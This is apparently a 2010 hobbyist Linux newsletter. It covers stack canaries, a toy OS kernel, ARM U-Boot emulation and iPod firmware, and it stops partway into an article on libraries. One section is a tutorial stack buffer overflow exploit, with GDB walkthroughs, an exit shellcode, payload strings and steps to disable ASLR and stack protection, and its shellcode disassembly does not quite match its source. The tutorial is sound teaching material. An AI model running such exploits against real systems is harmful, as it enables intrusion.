Community Newsletter

Issue 2, March 2010

In this issue:

This months authors:

Manohar Vanga

Random Tricks

1. Canaries and Buffer Overflows

In response to last months article "Buffer Overflow Attacks Demonstrated", Kartik Nayak wrote in saying:

I tried the code given by you in 'Buffer Overflow Attacks
Demonstrated'. But it didnt work the way you said. Instead this is
what my console shows:

$ ./a.out
Password: asdf
Password: asdf
Password: cookies
Not-so-top secret password protected area
$ ./a.out
Password: aaaaaaaaaaaaaaaaaaaa          //its 'a' 20 times here
Password: aaaaaaaaaaaaaaaaaaaa
Password: aaaaaaaaaaaaaaaaaaaaa
Password: aaaaaaaaaaaaaaaaaa
Password: aaaaaaaaaaaaaaaaaa
Password: aaaaaaaaaaaaaaaaaaa
Password: cookies
Not-so-top secret password protected area
*** stack smashing detected ***: ./a.out terminated
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x48)[0xb8063558]
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x0)[0xb8063510]
./a.out[0x8048542]
/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe5)[0xb7f7f685]
./a.out[0x8048421]
======= Memory map: ========
08048000-08049000 r-xp 00000000 08:11 1230086    /home/kartik/Desktop/a.out
08049000-0804a000 r--p 00000000 08:11 1230086    /home/kartik/Desktop/a.out
0804a000-0804b000 rw-p 00001000 08:11 1230086    /home/kartik/Desktop/a.out
09364000-09385000 rw-p 09364000 00:00 0          [heap]
b7f68000-b7f69000 rw-p b7f68000 00:00 0
b7f69000-b80c1000 r-xp 00000000 08:11 1303547
/lib/tls/i686/cmov/libc-2.8.90.so
b80c1000-b80c3000 r--p 00158000 08:11 1303547
/lib/tls/i686/cmov/libc-2.8.90.so
b80c3000-b80c4000 rw-p 0015a000 08:11 1303547
/lib/tls/i686/cmov/libc-2.8.90.so
b80c4000-b80c7000 rw-p b80c4000 00:00 0
b80cb000-b80d8000 r-xp 00000000 08:11 1286211    /lib/libgcc_s.so.1
b80d8000-b80d9000 r--p 0000c000 08:11 1286211    /lib/libgcc_s.so.1
b80d9000-b80da000 rw-p 0000d000 08:11 1286211    /lib/libgcc_s.so.1
b80da000-b80de000 rw-p b80da000 00:00 0
b80de000-b80f8000 r-xp 00000000 08:11 1286163    /lib/ld-2.8.90.so
b80f8000-b80f9000 r-xp b80f8000 00:00 0          [vdso]
b80f9000-b80fa000 r--p 0001a000 08:11 1286163    /lib/ld-2.8.90.so
b80fa000-b80fb000 rw-p 0001b000 08:11 1286163    /lib/ld-2.8.90.so
bf8e6000-bf8fb000 rw-p bffeb000 00:00 0          [stack]
Aborted

Why did this happen? The stack overflow did not happen earlier but it
gave an error later.

Regards,
Kartik Nayak

The stack smashing error above is a buffer overflow protection mechanism that makes use of special variables called canaries to detect when an overflow occurs.

Canaries or canary words are known values that are placed between a buffer and control data on the stack to monitor buffer overflows. When the buffer overflows, the first data to be corrupted will be the canary, and a failed verification of the canary data is therefore an alert of an overflow, which can then be handled, for example, by invalidating the corrupted data. The kernel keeps monitoring these canary variables and sends a SIGABRT signal to terminate the program if a corruption has been detected.

The terminology is a reference to the historic practice of using canaries in coal mines, since they would be affected by toxic gases earlier than the miners, thus providing a biological warning system.

When you are entering a string of size greater than 20 in this program, the canary word is getting corrupted and the program is aborting (although yours is happening a little later as it may take some time for the kernel to notice the corruption). GCC will also ignore any characters after 20 characters in this case which is probably why it didn't work as planned!

It seems your version of GCC is doing the buffer overflow protections by default. Try compiling it using the "-fno-stack-protector" flag like this:

$ gcc -fno-stack-protector example.c
$ ./a.out

There is actually a much simpler way to break through the program that struck me a day or two after releasing the first issue. This will work with any executable (stripped or not):

$ strings ./over
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
__isoc99_scanf
puts
printf
__libc_start_main
GLIBC_2.7
GLIBC_2.0
PTRh
<Y^_]
[^_]
Password: 
cookies
Not-so-top secret password protected area
$ 

Oh well! I guess its just another reason to never hardcode any sensitive stuff into executables.

2. Unmaintainable Code

I read an excellent article long ago on how to write unmaintainable code and recently found it buried in my bookmarks! While the article describes techniques from Java, the techniques work for most modern languages! It's a great way to really irritate your colleagues! Read the article here.

3. Bash Tricks

Here are a couple of tricks I found to speed up my bash usage!

4. xkcd Downloader Script

For those of you like me, who are fans of xkcd and want to download it to their hard drive for some reason, here's a bash script I wrote to download all of them:

xkcd Downloader (xkcdget)
#!/bin/bash

if [ -f index.html ]; then
    rm index.html
fi
# This value will need to be changed based on the latest number!
for i in {1..717};
do
    # Little prank that took me a while to notice!
    if [ $i -eq 404 ]; then
        continue
    fi
    wget -q http://xkcd.com/$i/
    url=`cat index.html | grep "Image URL" | cut -d \  -f 5 | cut -d \< -f 1`
    filename=`echo $url | cut -d / -f 5`
    newname=`echo $i\_$filename`
    if [ -f $newname ]; then
        echo "Comic #$i exists...skipping"
        rm index.html
        continue
    fi
    if [ -f $filename ]; then
        echo "Incomplete download for comic #$i"
        rm $filename
    fi
    echo Downloading comic \#$i
    wget -q $url
    mv $filename $newname
    rm index.html
done

I now have an archive of xkcd's on my cellphone to read on the bus!

Writing an Operating System - Part I

I've always wanted to write my own operating system that could be at least self-hosting. I don't really care to make it big, complex and efficient. I don't intend for it to be another Take-that-Linus-OS. I just want to have fun writing it! I have written a few operating systems in the past but I have never really been satisfied with the outcomes. In this set of articles I hope to start work on a new toy operating system that will hopefully become a useful tool for people to learn from. Just to concretize things a bit, below are my expectations for this operating system:

  • Self-Hosting - It should be able to run enough software to be able to compile its own source
  • When in doubt, mimic Linux - The simple reason for this is that the code is readily available
  • Keep It Simple Stupid - If something starts getting too complex, backtrack and redesign. Simplicity over efficiency
  • Clean comments - Keep the code commented enough for people to understand
  • Target the Intel x86 - While something like the ARM7 would be simpler, x86 is readily available to most people. It is also readily emulated. We will use 32 bit protected mode.
  • Multitasking, Filesystem, ELF Executables, POSIX-subset system calls, Simple shell implementation, Virtual memory, Ports of some system utilities.

NOTE: I use NASM for assembly rather than GAS, as I find the Intel syntax to be cleaner

In this article we make it boot up!

Booting Up!

How does the Intel x86 PC boot up anyway? We wont bother with the assembly level details of how things boot up. They are quite simple and well documented in many different places. A good set of examples is provided in this article or this one. We will use GRUB (GRand Unified Bootloader) to get started. Some of the advantages I have found of using GRUB to boot up your operating system are:

  • Sets up protected mode for you
  • Provides you with memory information
  • Provides dynamic loading of modules
  • Can read from many different file systems

There are many more but the above four have, in my past, proved to be very useful during the early stages of development. Throughout the tutorials, we will use Qemu to emulate our machine and test our operating system. I have gone ahead and made a GRUB bootable floppy image for use with Qemu. If you want to make your own bootable GRUB floppy, Google is your friend.

Let's try and boot with the floppy on Qemu:

$ qemu -fda floppy.img -boot a

If you dont have Qemu installed, you can do so using:

$ sudo apt-get install qemu

Once you run it, you should get a familiar GRUB screen with an entry called "ToyOS Kernel". When you press enter you should get an error saying "Error 15: File not found". This is because we are still to write the main kernel. Let's do that now!

The Miniature Kernel

GRUB has defined a specification for booting called the multiboot specification. The document gives an overview of the specification (read: long and boring). The good part is it provides us with an example kernel that we can use to start off with in the Examples section. Below is a stripped down version of the code with comments for people with absolutely no knowledge about low-level programming:

Bootup Code (boot.s)
global loader                           ; making entry point visible to linker
extern kmain                            ; kmain is defined elsewhere

; Setting up the Multiboot header - see GRUB docs for details
; These are just data definitions (like a #define)
MODULEALIGN equ  1<<0                   ; align loaded modules on page boundaries
MEMINFO     equ  1<<1                   ; provide memory map
FLAGS       equ  MODULEALIGN | MEMINFO  ; this is the Multiboot 'flag' field
MAGIC       equ    0x1BADB002           ; This 'magic number' lets bootloader find the header
CHECKSUM    equ -(MAGIC + FLAGS)        ; checksum required for checking

section .text                           ; Start of code section
align 4
MultiBootHeader:                        ; Use the above definitions to build the multiboot header
    dd MAGIC
    dd FLAGS
    dd CHECKSUM

; Initial kernel stack space (just a define)
STACKSIZE equ 0x4000                    ; 16kb.

loader:
    mov esp, stack+STACKSIZE            ; set up the stack
    
    push eax                            ; pass Multiboot magic number
    push ebx                            ; pass Multiboot info structure

    call  kmain                         ; call kernel proper

hang:                                   ; hang if the kernel returns
    jmp   hang
 
section .bss                            ; uninitialized code section
align 4
stack:
    resb STACKSIZE                      ; reserve 16k stack on a doubleword boundary

The above code creates the multiboot header so that GRUB can recognize the kernel. It then sets up a 16KB stack and calls our kernel main function with parameters as the multiboot magic number and a pointer to the multiboot information structure. Notice that kmain is defined as externs which means we need to still define it. Lets do that now:

Kernel main (main.c)
void kmain( void* mbd, unsigned int magic )
{
    /* Something went not according to specs. Print an error */
    /* message and halt */
    if(magic != 0x2BADB002)
        for(;;);

    /* Print a letter to screen to see everything is working: */
    unsigned char *videoram = (unsigned char *) 0xb8000;
    videoram[0] = 65; /* character 'A' */
    videoram[1] = 0x07; /* forground, background color. */

    /* Write our kernel here. Hang till the next tutorial :) */
    for(;;);
}

The above code checks that the magic value is correct. If not, it simply hangs. If it is, it prints a character to the upper left corner of the screen and hangs. Remember that the text mode screen is 80x25 characters and each value is represented by 2 bytes (lower one for the ASCII value and higher one for the colors). Before we can compile it, let us organize the code in memory using a linker script:

Linker Script (linker.lds)
ENTRY (loader)

SECTIONS{
    . = 0x00100000;

    .text :{
        *(.text)
    }

    .rodata ALIGN (0x1000) : {
        *(.rodata)
    }

    .data ALIGN (0x1000) : {
        *(.data)
    }

    .bss : {
        sbss = .;
        *(COMMON)
        *(.bss)
        ebss = .;
    }
}

The above script tells that the entry to start with is loader (which we defined in boot.s). This is like specifying that a program should start at main(). We then specify how the different sections of the program are organized in memory. The starting point is at 1MB (0x00100000). Then follow the text section, the read-only, constant data (such as character strings) section, the data section (initialized data goes here) and finally the uninitialized data section.

Below is a Makefile to compile the code into an ELF that GRUB can load at boot time:

Makefile (Makefile)
AS=nasm
CC=gcc
LD=ld

ASFLAGS=-f elf
CFLAGS=-ggdb -Wall -Wextra -nostdlib -nostdinc -fno-builtin -fno-stack-protector -nostartfiles -nodefaultlibs
LDFLAGS=-Tlinker.lds

SOURCES=boot.o main.o
KERNEL=toyos

all: $(SOURCES) link

%.o: %.s
    $(AS) $(ASFLAGS) $<

%.o: %.c
    $(CC) $(CFLAGS) -c $<

link:
    $(LD) $(LDFLAGS) $(SOURCES) -o $(KERNEL)

clean:
    rm -f *.o $(KERNEL)

Here are some points to note. We specify the output format as ELF using in the ASFLAGS variable which is used when compiling all files ending with .s (Assembly files). Remember that we are booting our own kernel and the library functions that we are accustomed to are not available to us. We disable them with the -nostdlib and -nostdinc additions to the CFLAGS variable which is used when compiling C sources. We also add some debugging support as Qemu provides debugging capabilities with GDB.

That's it! Go ahead and build it!

$ make
nasm -f elf boot.s
gcc -ggdb -Wall -Wextra -nostdlib -nostdinc -fno-builtin -fno-stack-protector -nostartfiles -nodefaultlibs -c main.c
main.c:1: warning: unused parameter 'mbd'
ld -Tlinker.lds boot.o main.o -o toyos
$ ls
Makefile  boot.o  boot.s  floppy.img  linker.lds  main.c  main.o  toyos

The toyos file is the output kernel. Let us now copy the binary to our floppy image:

$ sudo mount -o loop floppy.img /mnt
$ sudo cp toyos /mnt/boot/kernel
$ sudo umount /mnt

Now try running Qemu with the floppy image!

$ qemu -fda floppy.img -boot a

The other junk on the screen is there because we haven't really cleared the screen contents. We will clear this up in the next tutorial! If you are impatient like me, you can write out 2x80x25 '\0''s to the video memory in main.c before putting the character to screen.

Kernel main (main.c)
void kmain( void* mbd, unsigned int magic )
{
    ...

    unsigned char *videoram = (unsigned char *) 0xb8000;
    /* Clear the screen */
    int i;
    for(i=0;i<2*80*25;i++)
        videoram[i] = '\0';
    videoram[0] = 65;
    videoram[1] = 0x07;

    ...
}

Absolutely thrilling isn't it? We have just written a miniature kernel! Happy hacking!

Embedded Linux Development Primer

There have been a lot of mails requesting tutorials for getting started with embedded systems development so I thought I would write one to get people started. Embedded systems development is heavily dependent on the hardware you are developing for. To keep things neutral and fun for everybody, this article focuses on setting up a cross compiling toolchain and using it to boot into the U-Boot bootloader on Qemu-ARM (the Qemu ARM CPU emulator).

The Toolchain

In this article, we will use ELDK (Embedded Linux Development Kit) as the toolchain. It is available for MIPS, ARM and PowerPC platforms and can be downloaded at the ELDK website. It also comes with excellent documentation so that is a good plus point. There are many other solutions available out there but this article will focus on setting up and using ELDK.

ELDK is provided as an ISO image that we will download and use. Download it using:

$ wget -c http://ftp.denx.de/pub/eldk/4.2/arm-linux-x86/iso/arm-2008-11-24.iso

Let us mount the ISO and run the installer in the main directory. We will install it into the /opt/eldk-4.2 directory:

$ mount -o loop arm-2008-11-24.iso /mnt
$ cd /mnt
$ sudo mkdir /opt/eldk-4.2
$ ./install -d /opt/eldk-4.2
$ umount /mnt

And we have a cross compiling toolkit! Most programs look for the CROSS_COMPILE variable for a cross compiling prefix. For example, the ELDK ARM cross compiler is called arm-linux-gcc so we need to set CROSS_COMPILE to "arm-linux-". Since we have installed to a directory that isn't in the $PATH variable, we need to add the folder location to the prefix as well. I set up aliases to do the job for me:

$ echo "alias setcc=export CROSS_COMPILE=/opt/eldk-4.2/usr/bin/arm-linux-" >> ~/.bashrc
$ echo "alias unsetcc=export CROSS_COMPILE=" >> ~/.bashrc

To cross compile, we can use the setcc alias. Once we are done, we can use the unsetcc alias to revert back to our normal compiler.

U-Boot

U-Boot is a bootloader for embedded systems. It provides excellent functionalities that make like really simple for embedded developers. I will not go into details as it has great documentation available on its website. We will now configure and compile U-Boot. Let us get right to it:

$ git clone git://git.denx.de/u-boot.git
$ cd u-boot
$ setcc
$ make versatilepb_config
$ make

Once this is done, we will have a u-boot.bin file that we can load into Qemu if we want to test it (or if we are using real hardware, we would burn it onto the ROM).

Note: If you want to use U-Boot with Linux, you will need to put the U-Boot mkimage utility in the $PATH in order to create a uImage (U-Boot Image). We can copy that into a location specified in the $PATH variable:

$ cp ~/source/u-boot/tools/mkimage ~/bin

Booting Up!

What we need to do is to create a ROM image with the U-Boot binary burned onto it. We can use dd to get that done:

$ cat ~/qemu-arm/u-boot.bin /dev/zero | dd bs=1k count=256 > ~/qemu-arm/romimg

We can now run Qemu-ARM to emulate the ARM system with the following command:

$ qemu-system-arm -m 64 -M versatilepb -kernel /dev/null \
-mtdblock ~/qemu-arm/romimg -serial telnet:localhost:1200,server -S -s -gdb tcp::1234

The above command emulates an ARM system with 64MB of RAM. The versatile board is emulated with a blank kernel image (if you want to boot a Linux kernel image, it would go in place of /dev/null) and our previously created memory image. We also route the serial output via the telnet protocol to localhost:1200. The -S and -s options start it with debugging enabled and execution paused. The GDB port is specified as 1234.

In another window, Telnet locally to get the serial console:

$ telnet localhost 1200

In the old window, fire up the ARM-GDB and do the following:

$ ${CROSS_COMPILE}gdb
GNU gdb Red Hat Linux (6.7-2rh)
Copyright (C) 2007 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "--host=i686-pc-linux-gnu --target=arm-linux".
The target architecture is set automatically (currently arm)

(gdb) target remote localhost:1234
(gdb) load u-boot
(gdb) cont

You should now see the serial output on the Telnet port:

U-Boot 2009.08 (Mar 10 2010 - 00:34:58)

DRAM:   0 kB
## Unknown FLASH on Bank 1 - Size = 0x00000000 = 0 MB
Flash:  0 kB
*** Warning - bad CRC, using default environment

In:    serial
Out:   serial
Err:   serial
Net:   SMC91111-0
VersatilePB #

We have successfully set up a cross compiling toolchain, cross compiler the U-Boot bootloader for ARM and booted it up on Qemu. I have not gone into details on how to boot up Linux as it would be an entire article by itself. Perhaps in the future!

Happy Hacking!

Buffer Overflow Attacks Demonstrated - Again

I didn't plan on writing a second part to my previous article but I've been having so much fun with buffer overflows that I just had to share it! In this article we will try and break apart a simple program and make it execute whatever code we want it to! Excited yet? Read on!

I've always "heard" about how buffer overflows can be exploited to execute any piece of code that an attacker wants executed. I never really understood how it worked until I sat down recently and decided to sit and figure out how I could use it to execute a piece of code. I figured it out after a bit of logic and in this article I'll walk you through how I managed to do it. Let's start of with a stupid program that inputs a string without overflow checks:

#include <stdio.h>

void get_input(char *arg)
{
    char str[128];
    strcpy(str, arg);
}

int main(int argc, char *argv[])
{
    if(argc != 2)
    {
        printf("argc != 2\n");
        exit(1);
    }
    get_input(argv[1]);
    printf("End");
}

The program will take a string argument and copy it into a buffer of 128 bytes. We are now ready to use the handy tools we used last time to break this program apart. It's that simple!

Overwriting the Return Address

When a function is called, the return address is pushed onto the stack. If we overflow the buffer enough, we can overwrite the return address with whatever value we want. This gives us a nice hole to execute any piece of code we want! Let us first try and deconstruct the call stack in C and see how much we need to overwrite. In the program above we have a 128 character string to play around with. Let's use GDB to see what happens to the stack when we call the get_input function.

Remember that the call instruction pushes the return address onto the stack. When we enter the function, the old ebp register is pushed too as it is used for accessing local variables. Let us use GDB and see how we can overwrite the return address!

$ gcc -ggdb naive.c -o naive 
$ gdb ./naive
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/mvanga/Programming/test/shellcode/naive...done.
(gdb) set args `perl -e 'print "a"x150;'`
(gdb) break get_input 
Breakpoint 1 at 0x804841d: file naive.c, line 6.
(gdb) run
Starting program: /home/mvanga/Programming/test/shellcode/naive `perl -e 'print "a"x150;'`

Breakpoint 1, get_input (arg=0xbffff5d3 'a' <repeats 150 times>) at naive.c:6
6       strcpy(str, arg);
(gdb) 

We set a breakpoint in get_input and pass a string of 150 'a' (hexadecimal 0x61). Let's see what our stack frame looks like:

(gdb) info frame
Stack level 0, frame at 0xbffff380:
 eip = 0x804841d in get_input (naive.c:6); saved eip 0x8048478
 called by frame at 0xbffff3a0
 source language c.
 Arglist at 0xbffff378, args: arg=0xbffff5d3 'a' <repeats 150 times>
 Locals at 0xbffff378, Previous frame's sp is 0xbffff380
 Saved registers:
  ebp at 0xbffff378, eip at 0xbffff37c
(gdb) 

So the saved return address is 0x8048478 and it is stored on the stack at address 0xbffff37c. Let's see if it is getting overwritten by 150 characters first:

(gdb) step
7   }
(gdb) info frame
Stack level 0, frame at 0xbffff380:
 eip = 0x804842f in get_input (naive.c:7); saved eip 0x61616161
 called by frame at 0x61616169
 source language c.
 Arglist at 0xbffff378, args: arg=0x61616161 <Address 0x61616161 out of bounds>
 Locals at 0xbffff378, Previous frame's sp is 0xbffff380
 Saved registers:
  ebp at 0xbffff378, eip at 0xbffff37c
(gdb) 

Great! The return address got overwritten with 4 'a's (Hex 0x61). Let's see exactly how many characters we need to write in order to overwrite the return address. It should be the address of the saved eip minus the address of the string str. Let's see:

(gdb) print &str
$1 = (char (*)[128]) 0xbffff2f8
(gdb) print 0xbffff37c - 0xbffff2f8
$2 = 132
(gdb) 

So we need to write out 132 characters in order to reach the saved return address. We need another 4 to overwrite it! Let's try writing a known value (0x12345678) into the return address this time:

(gdb) set args `perl -e 'print "a"x132 . "\x12\x34\x56\x78";'`
(gdb) run
Starting program: /home/mvanga/Programming/test/shellcode/naive `perl -e 'print "a"x132 . "\x12\x34\x56\x78";'`

Breakpoint 1, get_input (arg=0xbffff5e1 'a' <repeats 132 times>, "\022\064Vx") at naive.c:6
6       strcpy(str, arg);
(gdb) info frame
Stack level 0, frame at 0xbffff390:
 eip = 0x804841d in get_input (naive.c:6); saved eip 0x8048478
 called by frame at 0xbffff3b0
 source language c.
 Arglist at 0xbffff388, args: arg=0xbffff5e1 'a' <repeats 132 times>, "\022\064Vx"
 Locals at 0xbffff388, Previous frame's sp is 0xbffff390
 Saved registers:
  ebp at 0xbffff388, eip at 0xbffff38c
(gdb) step
7   }
(gdb) info frame
Stack level 0, frame at 0xbffff390:
 eip = 0x804842f in get_input (naive.c:7); saved eip 0x78563412
 called by frame at 0x61616169
 source language c.
 Arglist at 0xbffff388, args: arg=0xbffff500 "\020"
 Locals at 0xbffff388, Previous frame's sp is 0xbffff390
 Saved registers:
  ebp at 0xbffff388, eip at 0xbffff38c
(gdb) 

It worked! The value is stored as 0x78563412 as the Intel architecture is little endian. Now we have a nice entry to execute whatever code we want. What if we stored a small program into the string we enter and then changed the return address to the address of our string? Wouldn't that be great? Let's try and see what the address of our string is and try to change the flow of execution to the string instead!

(gdb) print &str
$3 = (char (*)[128]) 0xbffff308
(gdb) set args `perl -e 'print "a"x132 . "\x08\xf3\xff\xbf";'`
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/mvanga/Programming/test/shellcode/naive `perl -e 'print "a"x132 . "\x08\xf3\xff\xbf";'`

Breakpoint 1, get_input (arg=0xbffff5e1 'a' <repeats 132 times>, "\b\363\377\277") at naive.c:6
6       strcpy(str, arg);
(gdb) step
7   }
(gdb) stepi
0x08048430 in get_input (arg=Cannot access memory at address 0x61616169
) at naive.c:7
7   }
(gdb) stepi
Cannot access memory at address 0x61616165
(gdb) x /10c $eip
0xbffff308: 97 'a'  97 'a'  97 'a'  97 'a'  97 'a'  97 'a'  97 'a'  97 'a'
0xbffff310: 97 'a'  97 'a'
(gdb) 

Whoa! That was cool! The program is now executing our little string full of 'a's! Remember that your system might be placing the stack in a different location. If you are following along, make the appropriate changes in your steps. Now the question is how do we store a little program into our string? Enter shellcoding!

A Simple Shellcode

A shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability (in our case the unchecked buffer overflow). It is called a "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine (hint: sneak peek of what's ahead!). Shellcode is commonly written in machine code, but any piece of code that performs a similar task can be called shellcode. Let's see how to write a simple shellcode that will simply exit the program without printing "End" to the screen.

Simple Exit Shellcode (exit.s)
[SECTION .text]           ; start the code section
global _start             ; entry point is default _start
_start:                   ; define our entry point
    xor eax, eax
    mov al, 1             ; exit() is the first syscall
    mov ebx, $42          ; return value 42
    int 0x80              ; call the exit() syscall!

Now what? We now need to convert it into a string! Let us create the string version of our program using our old friend objdump!

$ nasm -f elf exit.s
$ objdump -d exit.o 

exit.o:     file format elf32-i386

Disassembly of section .text:

00000000 >_start<:
   0:   31 c0                   xor    %eax,%eax
   2:   b0 01                   mov    $0x1,%al
   4:   31 db                   xor    %ebx,%ebx
   6:   cd 80                   int    $0x80

To create the string version, we put in the disassembled hex values as characters using a \x prefix like so:

"\x31\xc0\xb0\x01\x31\xdb\xcd\x80"

Let's try and run the program now with this string as the input! Since our string is 8 bytes long (8 characters), we need to pad it with 132-8 characters and finally append the string's address. Our final string can be printed using perl as follows:

$ perl -e 'print "\x31\xc0\xb0\x01\x31\xdb\xcd\x80" . "a"x124 . "\x08\xf3\xff\xbf";'

Note that the location of the stack in your system will vary. I realized only after reaching this far that the stack that is provided to a process is generated randomly and so it's a little difficult to keep track of where it is and modify our code based on that. My version of GDB luckily forces a constant stack which makes it easy to test. In newer versions of GDB, even this has been changed to randomized. This technique thus might not work for you exactly and might require some more tinkering.

$ ./naive `perl -e 'print "\x31\xc0\xb0\x01\x31\xdb\xcd\x80" . "a"x124 . "\x08\xf3\xff\xbf";'`
Segmentation fault
$ gdb ./naive 
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later >http://gnu.org/licenses/gpl.html<
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
>http://www.gnu.org/software/gdb/bugs/<...
Reading symbols from /home/mvanga/Programming/test/shellcode/naive...done.
(gdb) set args `perl -e 'print "\x31\xc0\xb0\x01\x31\xdb\xcd\x80" . "a"x124 . "\x08\xf3\xff\xbf";'`
(gdb) run
Starting program: naive `perl -e 'print "\x31\xc0\xb0\x01\x31\xdb\xcd\x80" . "a"x124 . "\x08\xf3\xff\xbf";'`

Program exited normally.
(gdb) 

As you can see above, without GDB, the program ends in a segmentation fault whereas with GDB the program works. This is due to stack randomization. Basically, the kernel generates a random stack location and passes it to the program every time an executable is run. The code for stack randomization can be found in the kernel sources:

Stack Randomization Code (fs/binfmt_elf.c)
#ifndef STACK_RND_MASK
#define STACK_RND_MASK (0x7ff >> (PAGE_SHIFT - 12))     /* 8MB of VA */
#endif

static unsigned long randomize_stack_top(unsigned long stack_top)
{
    unsigned int random_variable = 0;

    if ((current->flags & PF_RANDOMIZE) &&
        !(current->personality & ADDR_NO_RANDOMIZE)) {
        random_variable = get_random_int() & STACK_RND_MASK;
        random_variable <<= PAGE_SHIFT;
    }
#ifdef CONFIG_STACK_GROWSUP
    return PAGE_ALIGN(stack_top) + random_variable;
#else
    return PAGE_ALIGN(stack_top) - random_variable;
#endif
}

I guess some things are just hard to break apart! We did get pretty far though and that's really the fun part! But wait! Let's not give up hope yet! Linux is an open piece of software and there is indeed a way to turn off stack randomization. This is very useful for learning purposes although it is an extremely clever technique that is advantageous in non-academic environments. You can disable stack randomization using:

$ sudo sysctl -w kernel.randomize_va_space=0
$ sudo sysctl -p

You can re-enable it using:

$ sudo sysctl -w kernel.randomize_va_space=1
$ sudo sysctl -p

Admittedly, the above didn't work on my system even though it is a documented feature. This is probably because GDB is forcing a specific stack whereas the address forced in general might be different. The one way to find that out is to print the address of a variable on the stack and backtrack to the stack address. We can then modify the shell code accordingly. More detailed methods are provided on this page

In this article, we have successfully managed to exploit a buffer overflow in order to execute any piece of code we want. You can now head over to a site like Packet Storm and use some of the ready made exploits from there! I especially like the one that gives you a shell prompt by calling /bin/sh! Happy Hacking!

The Apple iPod and Linux

I've been a Linux user for a couple of years now and one place thing I've always had trouble with is with using my iPod under Linux. I decided to finally search and tackle this hurdle. This article describes how I tamed an Apple product using open source tools. Hopefully it will help someone else in the same situation as me.

Let's face it. Apple tries to be quite controlling when it comes to their products. The only way to use the iPod for example (on Windows and Mac) is to first download iTunes and use it to format it. Being a Linux user, the last thing I wanted was to make a mess just to load songs onto my iPod. So the obvious (not to mention uninteresting!) option of trying to make iTunes work with an emulation layer like Wine was out of the question. Not to mention the bloat of the iTunes software (the latest download is some 100mb!). I also didn't want to touch a Windows system in order to get anything done.

I should also mention that the reason I needed a way to format my iPod was because I had installed Rockbox onto my iPod and was quite unsatisfied with its battery usage and features in general. I just needed a minimalist operating system on my iPod to listen to music and Apple's does a decent job of that. Rockbox is somewhat bloated and buggy for my taste. Installing Rockbox created a mess though, and I needed a way to re-install the firmware into my iPod. This is where my journey begins.

Note: I use an iPod Nano (2nd Generation)

Reinstalling the Firmware

Re-installing the firmware into an iPod is not easy without iTunes. I luckily found this article that describes the partition structure of the iPod. Hello fdisk!

Plug in the iPod and first figure out what partition it is on. You can find out using "fdisk -l" and checking the partition listing. Let's assume it's on /dev/sdx. We now format it using fdisk. I have recreated the commands below for convenience:

$ sudo fdisk /dev/sdx
n   [make new partition]
p   [primary]
1   [first partition]
[ENTER] [default first sector is 1]
5S  [5 sectors -- big enough to hold 32MB]
[on 20GB models, use "+33MB" instead of 5S]

n   [make new partition]
p   [primary]
2   [second partition]
[ENTER] [default first sector is 6]
[ENTER] [default size uses all remaining space]

t   [modify type]
1   [first partition]
0   [first partition has no filesystem; ignore warning]

t   [modify type]
2   [second partition]
b   [second partition is FAT32]

p   [show partition map]

Device Boot    Start       End    Blocks   Id  System
/dev/sdx1          1         5     40131    0  Empty
/dev/sdx2          6      3647  29254365    b  Win95 FAT32

w   [commit changes to disk]

I found this site that has firmware images for various Apple products. I downloaded the one for my iPod Nano from there. The file extension is ipsw but it turns out to be a simple zip archive. Extract it using:

$ ls
iPod_29.1.1.3.ipsw
$ file iPod_29.1.1.3.ipsw 
iPod_29.1.1.3.ipsw: Zip archive data, at least v2.0 to extract
$ unzip iPod_29.1.1.3.ipsw
Archive:  iPod_29.1.1.3.ipsw
  inflating: Firmware-29.8.1.3       
  inflating: manifest.plist          
$ ls
Firmware-29.8.1.3  iPod_29.1.1.3.ipsw  manifest.plist

Now we need to write the Firmware* file onto the first partition of the iPod. I did this using:

$ sudo dd if=Firmware-29.8.1.3 of=/dev/sdx1

We also need to format the second partition as FAT so that we can add songs to it. Do that using:

$ mkfs.vfat -F 32 -n "ipod" /dev/sdx2

In the above command we use a 32 bit file allocation table and set the name of the volume to "ipod". Now just unplug and reboot the iPod. Reconnect and you have a clean iPod!

Adding Music

A music player is pretty much useless without ... music! While people suggest using something like Amarok or Rhythmbox to do this, I found it irritating to try and set these up for my iPod. I instead used gtkPod. It has a very simple interface and lets me copy my music without any unnescessary bells and whistles. Install and run it using:

$ sudo apt-get install gtkpod
$ gtkpod

Since there are better articles on how to actually use gtkPod to do the work, I'll leave you with one of those instead of going into details. The best one I found with a lot of screenshots can be found here.

I hope this helped someone! Happy hacking!

Writing Your Own Libraries in Linux

I have library fever! I define that as a condition where you start to break any piece of software you write into constituent libraries that are flexible enough to be generic and solve a small subset of a problem well. Lately, I've been writing libraries for everything (logging, automatic protocol generation, compression and networking libraries are the ones I've churned out in the last few weeks alone!). I thought it might be useful to write an article on how libraries work and how to write them under Linux. The idea is not just to explain how they work and how to use existing libraries but to also show how you can benefit from using them.

Static Libraries vs Dynamic Libraries

Let's write a simple example to understand the difference between static and dynamic libraries. Suppose we have two files as shown below:

First C File (one.c)
#include <stdio.h>

void print_hello(char *name)
{
    printf("Hello %s!\n", name);
}
Second C File (two.c)
#include <stdio.h>

void print_bye(char *name)
{
    printf("Goodbye %s!\n", name);
}

Let's compile them and use the nm tool to see exactly what they have inside:

$ gcc -c one.c
$ gcc -c two.c
$ nm one.o
